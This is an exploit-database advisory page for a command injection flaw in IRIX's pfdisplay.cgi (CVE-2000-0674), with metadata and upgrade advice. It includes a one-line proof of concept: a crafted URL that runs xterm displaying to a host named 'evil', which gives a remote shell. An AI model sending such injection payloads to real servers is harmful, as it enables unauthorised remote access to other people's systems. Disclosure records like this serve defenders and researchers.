header-logo
Suggest Exploit
vendor:
IRIX
by:
SecurityFocus
8.8
CVSS
HIGH
Command Injection
78
CWE
Product Name: IRIX
Affected Version From: IRIX 6.5.x
Affected Version To: IRIX 6.5.x
Patch Exists: YES
Related CWE: CVE-2000-0674
CPE: o:sgi:irix
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2000

Security Vulnerability with CGI Program pfdisplay.cgi

The vulnerability exists in the pfdisplay.cgi program distributed with IRIX. It allows an attacker to inject arbitrary commands into the program, which are then executed with the privileges of the web server. This can be exploited by sending a specially crafted HTTP request to the vulnerable CGI program.

Mitigation:

Upgrade to the latest version of IRIX.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/64/info

There exists a security vulnerability with the CGI program pfdispaly.cgi distributed with IRIX. This problem its not fixed by patch 3018.

$ lynx -dump http://victim/cgi-bin/pfdisplay.cgi?'%0A/usr/bin/X11/xterm%20-display%20evil:0.0|'

Navigation

Suggest Exploit

Services By CQR